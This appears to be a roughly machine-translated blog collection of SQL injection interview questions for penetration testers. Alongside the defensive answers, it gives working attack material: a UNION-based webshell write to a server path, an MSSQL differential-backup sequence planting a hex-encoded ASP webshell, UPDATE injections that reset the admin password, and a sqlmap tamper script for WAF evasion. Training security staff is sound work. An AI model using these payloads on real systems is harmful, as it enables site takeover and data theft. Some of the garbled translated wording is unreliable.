Table of contents
- foreword
- interview questions
-
- Common Database Ports
- What can SQL injection do (harm)?
- Types of SQL injection?
- MySQL injects common functions
- Defense methods for SQL injection
- How to escape characters when breaking injection
- Why Parameterized Queries Prevent SQL Injection
- What is the difference between mysql website injection above 5.0 and below 5.0?
- What is a blind bet? How to make a blind bet?
- What is the principle and root cause of wide byte injection?
- How to judge delayed injection?
- How Blind Injection Acquires Data Quickly
- How to use only update in SQL?
- There is a SQL injection vulnerability in the following link. What is your thinking about this deformed injection?
- Found the injection point of test?id=1, what ideas do you have to getshell, and what is the priority?
- Common parameters of SQLMap?
- How does SQLMap inject an injection point?
- SQL injection write shell condition
- Principle of udf privilege escalation
- MSSQL differential backup how to getshell
- SQL injection bypass (over waf) ideas
- SQLMAP write tamper script method
foreword
This article mainly collects interview questions related to SQL injection and keeps updating. Of course, due to the blogger’s lack of time, the update may not be very timely, but believe me, no matter how late, he will come!
Readers and friends are especially requested to pay attention to my blog, or pay attention to my WeChat public account: Xiaobai learns IT
interview questions
Common Database Ports
1、mysql:3306
2、sqlserver(mssql):1433
3、oracle:1521
4、postgreSQL:5432
5、db2:50000
What can SQL injection do (harm)?
1. The injection vulnerability of the login module can use the universal password to bypass the login authentication
2. Obtain data (off the database), and find out the password of the administrator account
3. Read the content of the file and write the file to the server (write webshell, the website is implanted Trojan horse)
4. Destroy the database and cause the website to crash
Types of SQL injection?
1. Classification by injection point data type: numeric type, character type
2. Classification by data transmission method: GET injection, POST injection, header injection (cookie injection, host injection, user-agent injection, referer injection...) 3
. Classified by execution effect: union injection attack, Boolean injection attack - Boolean blind injection, error injection attack, time injection attack - time blind injection, stack query injection attack, secondary injection attack, wide byte injection attack...
MySQL injects common functions
database() returns the current database name
user() returns the current database user name, alternative function: @@user
updatexml() updates the xml document, often used for error injection, alternative function: extractvalue()
mid() extracts from the specified field The content of the output field
limit() Returns the first few pieces of data in the result or the middle data
concat() Returns the string generated by the parameter
group_concat() Group splicing function, alternative function: concat_ws()
count() Returns the number of specified parameters
rand() parameter 0~1 random number
flood() round down
substr() intercept string, alternative function: substring() mid()
ascii() returns the ascii code of the string
left() returns the most string The specified number of characters on the left
ord() returns the ascii code of the character
length() returns the length of the string
sleep() delay function
Defense methods for SQL injection
1. Use a safe API
2. Escape the special characters entered
3. Use a whitelist to standardize user input
4. Use a blacklist to standardize user input. For example, users are not allowed to enter SQL-like strings such as select
5. Server-side Before submitting the database for SQL query, filter, escape, replace, and delete special characters
6. All SQL statements are precompiled and bound variables
7. Use security devices for protection, such as WAF
How to escape characters when breaking injection
1. Wide byte injection
2. Hex encoding bypass
Why Parameterized Queries Prevent SQL Injection
When using parameterized (precompiled, bound variable) queries, the database first compiles the SQL statement (the semantics of the SQL statement to be run has been determined), and then applies the bound parameter value. That is to say, after parameterized query is used, the value of the parameter will not change the semantics of the SQL statement, and the database will only execute the semantics of the compiled SQL statement.
What is the difference between mysql website injection above 5.0 and below 5.0?
1. There is no information_schema library below mysql5.0, and you can’t list names, you can only run table names violently.
2. Below mysql5.0, it is multi-user single operation.
3. Above mysql5.0, it is multi-user and multi-operation.
What is a blind bet? How to make a blind bet?
1. Blind injection means that when SQL injection is performed, the page does not display (echo) the execution results of the SQL statement on the page. It can only be judged whether there is SQL injection and the utilization method based on the change of the content returned by the server and the response time.
2. Booleb-based (Boolean blind injection) judges whether there is an injection by checking whether the content returned by the page is correct.
3. Time-based (time (delay) injection) judges the injection by the difference in server response time (the execution length of the SQL statement) , the delay effect can be caused by functions such as benchmark and sleep, or the delay effect can be achieved by constructing a joint query table of large Cartesian products.
What is the principle and root cause of wide byte injection?
字节基础:(1) Single-byte character set: All characters are represented by one byte, such as ASCII code (0-127); (2) Multi-byte character set: In a multi-byte character set, some bytes are represented by multiple The other part (possibly none) is represented by a single byte.
原理:
Wide byte injection mainly uses a feature of mysql. When GBK encoding is used, two characters will be considered as a Chinese character. When addslash and magic_quotes_gpc in php are enabled, single quotes (0x27) will be escaped to form '' , The hexadecimal code of \ is 0x5c. When GBK code is used, if there is a character like 0xdf before 0x5c, it will be combined to form a Chinese character, and the result is 0xdf5c27, and 0xdf5c will be combined into a Chinese character. The following quotation marks ( 27) It will take effect again naturally (the escape is invalid and eaten by df), this is the principle of wide byte injection.
根本原因
character_set_client (client character set) and character_set_connection (connection layer character set) are different, or the conversion function is used improperly, such as iconv, mc_convert_encoding.
解决方法
(1) Use mysql_set_charset (GBK) to specify the character set
(2) Use mysql_real_escape_string to escape.
The difference between mysql_real_escape_string and addslashes is that it will consider the currently set character set, because mysql_set_charset must be used to specify the character set before using mysql_real_escape_string.
How to judge delayed injection?
Construct the payload through sleep(), if the response time is inconsistent, there may be delayed injection.
Such as' and sleep(5) --+ If the page response time exceeds seconds, there is a delay injection
How Blind Injection Acquires Data Quickly
Use dnslog to assist blind injection
How to use only update in SQL?
Suppose the sql statement with injection is as follows:
update user set password='md5($passwd)',page='$page' where id='$id'
Idea: Since it is an update-type injection, the idea is to modify something directly. Of course, the actual operation may be difficult, but here is the main idea.
当注入点在passwd时,思路sql语句:Change any user password
update set password='md5($passwd)' where username='admin'#',page='$page' where id='$id'
当注入点在page时,思路sql语句change user level
update user set password='md5($passwd)',page='$page', userlevel='1' where id='$id'
当注入点在id时,思路sql语句Modify any user password directly
update user set password='md5($passwd)',page='$page' where id='' or username='admin'
There is a SQL injection vulnerability in the following link. What is your thinking about this deformed injection?
test.php?id=AnjNjndm==
The parameter id is likely to be base64-encoded. If it is confirmed that it is base64-encoded, we will base64-encode our test payload before testing
Found the injection point of test?id=1, what ideas do you have to getshell, and what is the priority?
1. With write permission, directly sqlmap --os-shell to get the shell (of course you can write it manually)
2. Pull the data, get the website account (preferably with an administrator account), and upload the vulnerability getshell through the background.
The first type has the highest priority and the fastest speed, but it needs to be decided according to the specific situation.
Common parameters of SQLMap?
-u specifies the url
-r specifies the text file of the request packet
-m runs get injection in batches
–current-db gets the current database
–table gets the data table under the specified database
–tamper specifies the tamper script to bypass
–os-shell gets the shell
– random-agent Randomly specify user-agent
注:只列举这么多,具体情况看个人对sqlmap的熟悉情况,没事儿多用。
How does SQLMap inject an injection point?
1. Get type injection, direct sqlmap -u url address
2. Post type, (1) sqlmap -u url --data=post parameter (2) sqlmap -r request file address of data packet
3. Header injection, sqlmap - r The file address of the request packet
Note: When performing post injection or header injection, you can use * to mark the injection point
SQL injection write shell condition
1. The current database user is required to have administrator privileges
2. The absolute path of the website needs to be known
3. The directory writable by the website is required
4. MySQL needs to configure secure_file_priv to be empty
示例:
d=1' and 1=2 union select 1,2,'shell内容' into outfile "/www//site//shell.php" %23
Note: It is more direct to use sqlmap --os-shell
Principle of udf privilege escalation
MySQL supports user-defined functions. Malicious users put dlls containing custom functions into specific folders, declare the execution functions introduced in the introduction, and use the executed functions to execute system commands.
MSSQL differential backup how to getshell
前提条件:
1. MSSQL specific dbo and sa authority (database backup authority)
2. Support stack query
3.
实现原理
After knowing the absolute path of the website and complete backup, modify the database again, the differential backup will record the last LSN, write the shell into the database, and back up to asp can getshell.
1.完整备份一次
backup database 库名 to disk =
'c:\ddd.bak';--
2.创建表并插入数据
create table [dbo].[dtest] ([cmd]
[image]);--
insert into dtest(cmd)
values(0x3C25657865637574652872657175657374282261222929253E);--
0x3C25657865637574652872657175657374282261222929253E, this is the pony content: <%execute(request(“a”))%>
3.进行差异备份
backup
database 库名 to disk='目标位置\d.asp' WITH
DIFFERENTIAL,FORMAT;--
SQL injection bypass (over waf) ideas
1. Bypass inline comments
2. Bypass filling dirty data
3. Change the request method, such as GET to POST
4. Random agent bypass
5. Fuzz filter function, function replacement bypass
6. sqlmap, tamper script bypass- ---The above ideas
SQLMAP write tamper script method
tamper脚本编写模板
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
pass
PROIORITY
It is used to define the priority of tamper. It will take effect when multiple tampers are called. The priority is as follows. The larger the value, the higher the priority
LOWEST = -100
LOWER = -50
LOW = -10
NORMAL = 0
HIGH = 10
HIGHER = 50
HIGHEST = 100
dependencies
It is used to prompt the user about the applicable scope of tamper. The specific code is as follows:
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("过狗tamper '%s' 只针对 %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
DBMS.MYSQL stands for MYSQL, other databases by analogy
tamper关键函数,用于定义过滤规则,示例代码如下:
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def tamper(payload, **kwargs):
payload=payload.replace('AND','/*!29450AND*/')
payload=payload.replace('ORDER','/*!29450order*/')
payload=payload.replace('LIKE USER()','like (user/**/())')
payload=payload.replace('DATABASE()','database/*!29450*/()')
payload=payload.replace('CURRENT_USER()','CURRENT_USER/**/()')
payload=payload.replace('SESSION_USER()','SESSION_USER(%0a)')
payload=payload.replace('UNION ALL SELECT','union/*!29450select*/')
payload=payload.replace('super_priv','/*!29450/**/super_priv*/')
payload=payload.replace('and host=','/*!29450and*/host/*!11440=*/')
payload=payload.replace('BENCHMARK(','BENCHMARK/*!29450*/(')
payload=payload.replace('SLEEP(','sleep/**/(')